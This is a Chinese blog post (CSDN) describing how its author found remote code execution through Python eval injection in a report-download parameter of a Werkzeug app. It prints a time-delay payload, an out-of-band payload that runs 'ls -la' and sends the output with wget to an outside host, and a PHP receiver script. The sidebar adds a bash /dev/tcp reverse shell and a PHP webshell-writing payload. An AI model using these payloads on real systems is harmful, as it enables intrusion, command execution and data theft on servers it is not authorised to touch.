记一次曲折的RCE挖掘过程

最新推荐文章于 2025-04-14 21:34:27 发布
最新推荐文章于 2025-04-14 21:34:27 发布
阅读量1.6k 收藏 10
点赞数
分类专栏: Web安全 文章标签: 漏洞挖掘 rce
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/he_and/article/details/108522102
版权

本漏洞由@Sh4dow供稿,🐂就完事儿了

简单记录一下这个漏洞,没啥特殊的手法,就是细心与fuzz🤔

目标应用有一个下载文件的功能,你可以以csv格式下载报告

抓包结果如下:

看起来好像没啥问题,但是响应中的Werkzaug与python吸引了我的注意,不了解Werkzaug的可以去看一下

我尝试着用一些其他的payload替换了params参数的值,都是报错,看起来真就没啥问题,我都准备不看这个点了,但是,当我用空参数的时候,服务器返回了500错误

这说明这个参数还是会影响服务器的运行的嘛(当然也不一定,这里只是我的一个猜测),为了进一步确定,我开始fuzz这个参数

最后把各种报错整理了一下,发现所有和python相关的payload都报了500错误😀

看起来有戏,于是把python rce的payload进行了一下url编码,

eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29

成功执行,服务器产生了延时:

由于数据不会回显,我们就只有用其他手法来外带数据了,还记得上一篇文章的内容吗?

没有看上一篇文章的快回头去瞅瞅😉

构造payload:

eval(compile("""for x in range(1):\n import os\n os.popen(r'wget http://axin.com:8000/shell.php?cmd="$(ls -la)”)read()”””,’’,’single’))

然后在我们的服务器axin.com上部署一份shell.php文件,文件内容如下:

<?php
$a = fopen('POC.txt', 'a');
fwrite($a, $_GET["cmd"]);
fclose($a);
?>

发送payload,并查看POC.txt文件的内容:

nice的不得了,当然,也可以直接弹shell

网络攻击攻击之-远程命令执行/RCE告警运营分析篇
村中少年的专栏
05-27 443
从远程命令执行的定义,流量数据包,suricata规则,告警研判,处置建议等几个方面阐述如何通过IDS/NDR,态势感知等流量平台的远程命令执行类型的告警的线索,开展日常安全运营工作,从而挖掘有意义的安全事件。
网络攻击攻击之-远程代码执行/RCE告警运营分析篇
村中少年的专栏
05-27 497
从远程代码执行的定义,流量数据包,suricata规则,告警研判,处置建议等几个方面阐述如何通过IDS/NDR,态势感知等流量平台的远程代码执行类型的告警的线索,开展日常安全运营工作,从而挖掘有意义的安全事件。
命令注入_每日一问:一次命令注入RCE
weixin_31785421的博客
12-24 209
在qq群里提出了一个每日一问的活动,目的是拓展渗透实战思路,问题不限于渗透、审计、红队、逆向。这篇文章是昨天晚上临时由实战环境改的一个CTF题。题目模拟真实环境在群里出了一道CTF题当作每日一问,代码形如:phpheader('Content-Type: text/html; charset=utf-8');//error_reporting(0);$upload_dir = 'uplo...
Python打包应用程序
陌上人如玉,公子世无双。
01-15 212
命令行执行: pyinstaller -F --noconsole main.py 其中,main.py 是入口,含有 if __name__ == "__main__.py"。 如果想要让打包出来的程序运行时含有控制台界面,方便看日志,则把参数--noconsole去掉即可。
CVE重要漏洞复现-Fastjson1.2.24-RCE漏洞
最新发布
zj2084的博客
04-14 848
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了阿里巴巴公司开源Java开发组件Fastjson存在反序列化漏洞(CNVD-2022-40233)。攻击者可利用该漏洞实施任意文件写入、服务端请求伪造等攻击行为,造成服务器权限被窃取、敏感信息泄漏等严重影响。
Python应用程序打包
Léon
02-05 642
Python应用程序打包
黑盒挖掘rce思路
goddemon
11-11 877
黑盒常见的几个点 1.文件上传 filename处这些 2.邮箱 3.存在域名的地方 典型使用的payload path拼接 1.常规拼接思路 | ping `whoami`.z889xcgz67006o0itleim0vxcoie63.burpcollaborator.net | 2.直接反弹shell方法,编码的反弹shell思路 | bash -i >& /dev/tcp/123.*.*.182/8080 0>&1 | tes.txt || echo YmFzaCAtaS
一次tp5.0.9RCE
weixin_43570648的博客
09-21 420
目标 常规报错 直接说版本tp5.0.9,然后尝试payload _method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo打出phpinfo 顺便看了哈disable_function 基本执行命令的payload都被禁了 还好payload多,直接拿下 s=file_put_contents(‘dd.php’,’<?php @eval($_POST[1]);’)&_method=__
细说漏洞挖掘
bluemoon_0的博客
03-14 326
细说漏洞挖掘
新手上路 | 我在HackerOne上参与的一次漏洞众测邀请项目--转
dengdang7631的博客
03-04 1671
转载出处http://www.sohu.com/a/224698717_354899 这是一件关于我参与Hackerone平台某漏洞邀请项目的事,在此我要感谢该项目发起公司,他们友善的态度、及时的漏洞修复和奖金发放效率,让所有存在的提交漏洞都能在7天之内有所处理解决,我个人非常荣幸能参与这样的漏洞众测项目。 我是一个漏洞挖掘小白,现阶段来说,奖金并不是我参与漏洞众测项目的主要原因,...
Python打包exe应用程序
OneWord233的博客
12-28 512
要打包应用程序,首先我们要导入PyInstaller库,我们可以在File/Setting菜单下添加。 接着,我们打开Terminal窗口,输入指令: pyinstaller -F -w XXXX XXXX,代表需要打包的py文件路径,例如D://PythonPro/Other/Test.py -F,代表打包单个程序 -w,代表打包窗体程序,不经过控制台...
3. 打包python应用程序
热门推荐
hubing_hust的专栏
11-13 1万+
python程序打包为exe可执行文件
e7xue.php漏洞_Laravel5.7反序列化漏洞RCE挖掘
weixin_39821035的博客
12-21 340
在前一阵的 2019强网杯线下赛 中,出现一道 Laravel5.7 RCE 漏洞的利用。之前有关注过这个漏洞,但没细究。比赛期间,原漏洞作者删除了详细的分析文章,故想自己挖掘这个漏洞利用链。本文将详细记录 Laravel5.7 反序列化漏洞RCE链 的挖掘过程漏洞环境直接使用 composer 安装 laravel5.7 框架,并通过 php artisan serve 命令启动 Web 服务...
RCE漏洞挖掘经验分享(一)
记录并分享学习安全的知识点..
01-21 2486
一、RCE漏洞概述 RCE又称远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 产生的原因:服务器没有对执行命令的函数做严格的过滤,最终导致命令被执行。 二、命令执行函数 1.PHP代码执行函数: eval()、assert()、preg_replace()、create_function()、array_map()、call_user_func()、call_user_func_array()、array_filter()、uasort()、等
怎么使用python打包一个应用?
Dream_it_possible!的博客
08-19 530
在django-polls目录外输入命令: python -m pip install --user django-polls/dist/django-polls-0.1.tar.gz 成功后,会出现如下提示: 想卸载应用? python -m pip uninstall django-polls
RCE远程命令执行漏洞挖掘思路
gududeajun的博客
09-01 4212
RCE漏洞存在的地方包括:在url参数上,文件下载处,在查看图片,查看文件等地方在文件删除上,SSRF可能存在的地方,变量参数提交的地方等
74CMS的RCE挖掘思路
include_voidmain的博客
04-06 2833
0x01 前言 在漏洞挖掘时发现了一个RCE漏洞,这个漏洞的发掘,利用过程比较有趣,和大家分享一下~ 实际上在半个月前,本人发布了一篇关于DedeCMS前端RCE分析并扩展RCE挖掘思路的文章。这篇文章中DedeCMS这个前端RCE出现的问题在于,浏览器发送至服务器数据包中的referer并没有进行过滤,并且将referer中的内容写入cache,然后include包含至当前文件,造成了代码注入,实现了RCE。在这里,执行并没有用eval,shell_exec,exec之类的危险函数,而是在于include
chatgpt赋能python:Python如何打包应用:一份完整的指南
vacvefito的博客
06-06 425
Python打包是指将Python代码及其依赖项归档成一个单一的可执行文件或库文件,以便您可以与其他人分享您的应用程序。由于Python是一门解释性语言,因此需要Python解释器才能运行Python程序。将Python代码打包成可执行文件或库文件可以将Python解释器和依赖项包含在其中,从而使其他人无需安装Python解释器或其他依赖项即可运行您的Python应用程序。本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc。
如何打包python应用(二)
追逐阳光的风
12-26 2042
对于python编程之后,除了在Python IDE中运行之外,可以将python的程序打包为python应用,直接在PC环境上运行。对于python打包目前有很多第三方库文件直接使用。在这里主要介绍一下cx freeze和pyinstaller两种
如何实现Web漏洞挖掘模块
03-23
<think>好的,用户之前询问了HTTP流量回放可以挖掘哪些Web应用漏洞类型,现在他们想知道如何实现一个Web漏洞挖掘模块。我需要从之前的回答中提取相关的技术点,然后结合系统设计来构建这个模块。 首先,用户可能是一位安全工程师或者开发人员,想要自己构建一个自动化漏洞扫描工具。他们需要了解整个模块的架构、核心组件以及实现的关键技术。之前的回答已经覆盖了漏洞类型,现在需要转向如何具体实现检测这些漏洞的模块。 接下来,我需要考虑实现漏洞挖掘模块的主要步骤。可能包括流量采集、数据处理、漏洞检测引擎、结果分析等部分。需要详细说明每个部分的功能和实现方法,比如流量采集可以使用代理或日志,数据处理需要规范化和去重,漏洞检测需要规则引擎和动态插桩等。 然后,要结合之前提到的漏洞类型,比如SQL注入、XSS、越权访问等,说明在检测模块中如何针对这些漏洞设计检测策略。例如,对于SQL注入,可以使用规则匹配和模糊测试,而越权访问则需要参数变异和上下文关联分析。 还需要考虑关键技术点,比如流量变异策略、上下文感知、沙箱环境等,这些都是确保检测有效性和安全性的重要因素。同时,性能优化和误报率控制也是用户可能关心的问题,需要提到并发控制和机器学习去误报的方法。 另外,用户可能对现有的开源工具和框架感兴趣,比如Sqlmap、XSpear,以及如何集成它们。这部分可以作为扩展参考,帮助用户快速搭建原型。 最后,要总结实现过程中的挑战和最佳实践,比如隔离测试环境、版本迭代、合规性等,确保用户在实际操作中能避免常见问题,提高模块的效率和准确性。</think>### Web漏洞挖掘模块实现方案 --- #### 一、系统架构设计 ```mermaid graph TD A[流量采集层] --> B[数据处理层] B --> C[漏洞检测引擎] C --> D[结果分析层] D --> E[可视化报告] ``` --- #### 二、核心组件实现 **1. 流量采集模块** - **实现方式**: - 中间人代理(MITM):拦截HTTP/HTTPS流量 - 服务端日志解析:处理Nginx/Apache访问日志 - 浏览器插件:记录前端DOM操作 - **关键技术**: ```python # 使用mitmproxy实现流量捕获 from mitmproxy import http def request(flow: http.HTTPFlow): if flow.request.pretty_url.endswith(".php"): save_to_database(flow.request) ``` **2. 数据预处理模块** - **功能实现**: - 参数标准化:将`%20`转换为空格等URL解码 - 会话重组:基于Cookie/SessionID合并相关请求 - 敏感信息脱敏:自动过滤密码、Token等字段 - **数据结构**: ```json { "timestamp": "2023-08-20T14:23:18Z", "method": "POST", "path": "/api/login", "params": { "username": "test", "password": "******" }, "headers": { "User-Agent": "Mozilla/5.0" } } ``` --- #### 三、漏洞检测引擎 **1. 规则库构建** | 漏洞类型 | 检测策略 | 示例规则 | |----------------|--------------------------------------------------------------------------|-------------------------------------------------------------| | **SQL注入** | 语法特征匹配 + 响应差异分析 | `检测包含'sleep(5)'且响应延迟>4秒的请求` | | **XSS** | DOM树变异检测 + HTML实体编码验证 | `插入<img/src/onerror=alert(1)>后验证事件触发` | | **越权访问** | ID序列爆破 + 响应内容相似度对比 | `遍历/user/{id},对比不同ID返回数据的相似度阈值<15%` | **2. 动态插桩技术** - **实现原理**: - 在Web容器中注入探针监控以下行为: ```java // Java Agent示例(检测RCE) Runtime.exec() → 记录执行参数 SQLDriver.connect() → 捕获原始SQL语句 ``` - **风险行为监控**: - 文件系统操作(create/delete) - 反射机制调用 - 反序列化操作 **3. 模糊测试框架** - **变异策略**: ```python def mutate_params(params): for key in params: # 类型推断变异 if is_numeric(params[key]): params[key] = random.randint(0, 10000) elif is_string(params[key]): params[key] = f"' {random.choice(SQL_KEYWORDS)} --" # 结构变异 if random.random() < 0.2: params[key] += "../../etc/passwd" return params ``` --- #### 四、关键技术实现 **1. 流量变异引擎** - **智能变异算法**: ```python class SmartMutator: def __init__(self): self.markov_chain = load_training_data("web_logs.csv") def generate_payload(self): # 基于马尔可夫链生成符合目标特征的Payload return self.markov_chain.generate() ``` **2. 上下文感知检测** - **状态维持机制**: - 维护虚拟用户会话状态机: ```python class SessionState: def __init__(self): self.csrf_tokens = {} self.auth_cookies = {} def update(self, response): if 'Set-Cookie' in response.headers: self.auth_cookies = parse_cookies(response) if 'csrf_token' in response.text: self.csrf_tokens = extract_csrf(response) ``` **3. 漏洞验证模块** - **误报消除策略**: - 二次验证流程: ```mermaid graph LR A[初步检测] --> B{是否高危漏洞?} B -->|是| C[人工验证] B -->|否| D[自动验证] D --> E[发送无害化Payload] E --> F{行为监控} F --> G[确认漏洞存在] ``` --- #### 五、系统优化方案 **1. 性能优化** - **并发控制**: ```go // Go语言实现并发控制器 func main() { sem := make(chan bool, 50) // 限制50并发 for req := range requestQueue { sem <- true go func(r Request) { defer func() { <-sem }() processRequest(r) }(req) } } ``` **2. 机器学习应用** - **误报过滤模型**: ```python # 使用XGBoost分类器 model = xgb.XGBClassifier() model.fit( X_train[['resp_code', 'resp_time', 'keyword_count']], y_train['is_false_positive'] ) ``` **3. 规则自更新** - **CVE监控流程**: ```bash # 自动化规则更新脚本 curl https://cve.mitre.org/data/downloads/allitems.csv | \ awk -F',' '/CVE-2023.*WEB/{print $2}' | \ xargs -I {} python add_rule.py --cve {} ``` --- #### 六、扩展参考方案 **1. 开源工具集成** | 工具名称 | 集成方式 | 适用场景 | |----------------|-----------------------------|-----------------------| | **Sqlmap** | REST API调用 | SQL注入深度检测 | | **XSStrike** | 作为XSS检测子模块 | 反射型/DOM型XSS | | **Nuclei** | 模板化规则导入 | 已知漏洞快速验证 | **2. 云原生部署** - **Kubernetes架构**: ```yaml apiVersion: apps/v1 kind: Deployment spec: containers: - name: crawler image: vuln-crawler:3.2 - name: analyzer image: vuln-analyzer:2.8 - name: reporter image: report-dashboard:1.4 ``` --- ### 实现挑战与最佳实践 **关键挑战**: 1. 动态Web框架(React/Vue)的DOM事件捕获 2. 加密流量(HTTP/3、QUIC协议)处理 3. 分布式系统的状态同步 **实施建议**: 1. 采用差分测试:对比生产环境与测试环境的响应差异 2. 建立漏洞知识图谱:关联CWE、CVE数据 3. 实现自动绕过机制:处理WAF、CC防护等安全设备 --- **总结**:完整的Web漏洞挖掘模块需要整合流量分析、规则引擎、模糊测试、行为监控等多维度技术。建议采用分层架构设计,结合机器学习的误报过滤和智能变异算法提升检测效率,同时通过容器化部署实现弹性扩展。对于业务系统,需特别注意添加无害化检测机制避免对生产环境造成影响。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值